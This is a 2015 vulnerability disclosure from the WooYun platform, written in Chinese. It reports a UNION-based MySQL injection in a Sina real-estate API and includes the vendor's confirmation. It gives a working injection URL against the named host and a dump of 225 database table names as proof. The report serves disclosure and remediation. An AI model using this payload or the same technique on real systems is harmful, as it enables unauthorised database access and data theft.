当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-095008
漏洞标题:
新浪又一站点MySQL注射(支持union)
相关厂商:
新浪
漏洞作者:
lijiejie
提交时间:
2015-02-01 13:58
修复时间:
2015-03-18 14:00
公开时间:
2015-03-18 14:00
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-02-01: 细节已通知厂商并且等待厂商处理中
2015-02-02: 厂商已经确认,细节仅向厂商公开
2015-02-12: 细节向核心白帽子及相关领域专家公开
2015-02-22: 细节向普通白帽子公开
2015-03-04: 细节向实习白帽子公开
2015-03-18: 细节向公众公开

简要描述:

新浪又一站点MySQL注射(支持union)

详细说明:

注射点:

http://i.house.sina.com.cn:80/api/cities.php?act=get_city_by_province&callback=jQuery18204528277686331421_1422735366633&format=json&province=11 UNION ALL SELECT 1,user(),version(),4,5,6,7,8%23&_=1422735366958


参数province可注入,支持union.

漏洞证明:

sina.com.cn.mysqli_2.png


[*] i_house_sina_com_cn
[*] information_schema
[*] test
Database: i_house_sina_com_cn
[225 tables]
+-----------------------------+
| activity_tj_vnet            |
| activity_vplan              |
| admin_chongzhi_log          |
| admin_compose               |
| admin_groups                |
| admin_log                   |
| admin_notice                |
| admin_user                  |
| airticket_action            |
| api_access_log              |
| api_request_log             |
| archive_edm_send_log_2010   |
| archive_edm_send_log_201002 |
| archive_edm_send_log_201003 |
| archive_edm_send_log_201004 |
| archive_edm_send_log_201005 |
| auction_bidlog              |
| auction_info                |
| auction_news                |
| auction_signup              |
| auction_topprice            |
| black_list                  |
| bnmf_click_log              |
| bnmf_gift                   |
| bnmf_gift_config            |
| bnmf_intention_log          |
| bnmf_invite                 |
| bnmf_invite_bj              |
| bnmf_order                  |
| bnmf_order_bj               |
| bnmf_result                 |
| callcenter_analysis_dialy   |
| callcenter_analysis_month   |
| callcenter_record           |
| callcenter_seat_record      |
| callcenter_source_record    |
| callcenter_telphone         |
| card_manage                 |
| city2list_ids               |
| club_fields                 |
| club_import                 |
| club_ls_member              |
| club_templates              |
| club_user_400               |
| club_user_import_log        |
| club_user_info              |
| club_user_info_inactive     |
| club_user_info_offline      |
| club_user_info_offline_bak  |
| club_user_online_temp       |
| config_city                 |
| config_city_log             |
| data_analyze_log            |
| duplicate_cardnumber        |
| editor_contacts             |
| editor_contacts_feedback    |
| editor_contacts_log         |
| editor_contacts_photo       |
| edm_blacklist               |
| edm_category                |
| edm_click_log               |
| edm_content                 |
| edm_cron                    |
| edm_open_log                |
| edm_request                 |
| edm_seed                    |
| edm_send_log                |
| edm_send_quota              |
| edm_setting                 |
| edm_sms_log                 |
| email_activate_log          |
| email_active_log            |
| fy_uc_user                  |
| gift_exchange               |
| gift_ext                    |
| giftexchange_log            |
| house_data_baidu            |
| industry_data               |
| industry_fields             |
| industry_import             |
| industry_log                |
| industry_templates          |
| kuba_card                   |
| login_log                   |
| member_realty_publication   |
| mms_blacklist               |
| mms_content                 |
| mms_cron                    |
| mms_product                 |
| mms_send_log                |
| mms_template                |
| mms_template_title          |
| mobile_code                 |
| nickname_infotobase         |
| null_nickname_recode        |
| payment_order               |
| reg_error_log               |
| reg_error_malice_ip         |
| reghost_recode              |
| sales_manage                |
| sales_sendsms_log           |
| search_for_base_user        |
| search_for_club_user        |
| sina_api_log                |
| sinaname_mapping            |
| sms_blacklist               |
| sms_content                 |
| sms_cron                    |
| sms_cron_bak                |
| sms_log                     |
| sms_product                 |
| sms_request                 |
| sms_send_log                |
| sms_send_log_bak            |
| sms_subscribe               |
| sms_subscribe_report        |
| sms_unique                  |
| sms_whitelist               |
| soho_admin_compose          |
| soho_admin_controller       |
| soho_admin_users            |
| soho_kfs                    |
| soho_log                    |
| sso_log                     |
| sso_reg_log                 |
| sso_uid_mapping             |
| stat_all                    |
| stat_all2                   |
| stat_all_set                |
| stat_callcenter             |
| stat_datause                |
| stat_everyday               |
| stat_everyday_set           |
| stat_userfrom               |
| stat_useroffline            |
| third_party_login           |
| top_house                   |
| top_house_city              |
| tuan_order                  |
| ump_block_data              |
| ump_dictionary              |
| ump_dynamic_list            |
| ump_export_limit            |
| ump_export_log_email        |
| ump_export_log_mobile       |
| ump_fixed_list              |
| ump_import_log              |
| ump_import_templates        |
| ump_industry_user           |
| ump_industry_user_meta      |
| ump_list                    |
| ump_offline_user            |
| ump_offline_user_meta       |
| urs_admin_groups            |
| urs_club_fields             |
| urs_club_templates          |
| urs_club_user_info_offline  |
| urs_edm_request             |
| urs_house_contact           |
| urs_industry_log            |
| urs_mms_request             |
| urs_sms_request             |
| urs_to_sms_log              |
| user_auditing               |
| user_base                   |
| user_base_inactive          |
| user_callcenter             |
| user_card                   |
| user_cardnumber             |
| user_creditbonus_log        |
| user_data_outbound          |
| user_data_search            |
| user_draw                   |
| user_esf_callcenter         |
| user_focus                  |
| user_golf                   |
| user_info                   |
| user_info_inactive          |
| user_intention              |
| user_invite_recode          |
| user_reflection_0           |
| user_reflection_1           |
| user_reflection_2           |
| user_reflection_3           |
| user_reflection_4           |
| user_reflection_5           |
| user_reflection_6           |
| user_reflection_7           |
| user_reflection_8           |
| user_reflection_9           |
| user_reset_link             |
| user_reset_log              |
| user_search                 |
| user_sendlejubi_flag        |
| user_service                |
| user_sms_activate           |
| user_sms_activate_log       |
| user_temporary              |
| user_temporary_inactive     |
| user_upload_record          |
| users                       |
| uss_fields                  |
| uss_focushouse              |
| uss_project                 |
| uss_project_field           |
| uss_user_data               |
| uss_user_data_base          |
| uss_user_data_extend        |
| uss_user_search             |
| video_log_fail              |
| video_log_suss              |
| will_user                   |
| will_user_0                 |
| will_user_1                 |
| will_user_2                 |
| will_user_3                 |
| will_user_4                 |
| will_user_5                 |
| will_user_6                 |
| will_user_7                 |
| will_user_8                 |
| will_user_9                 |
| wpw_active                  |
| xw_goumaili                 |
| xw_huoyuedu                 |
+-----------------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 lijiejie@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-02-02 10:04

厂商回复:

第三方合作业务,已经通知进行整改,感谢对新浪安全的支持

最新状态:

暂无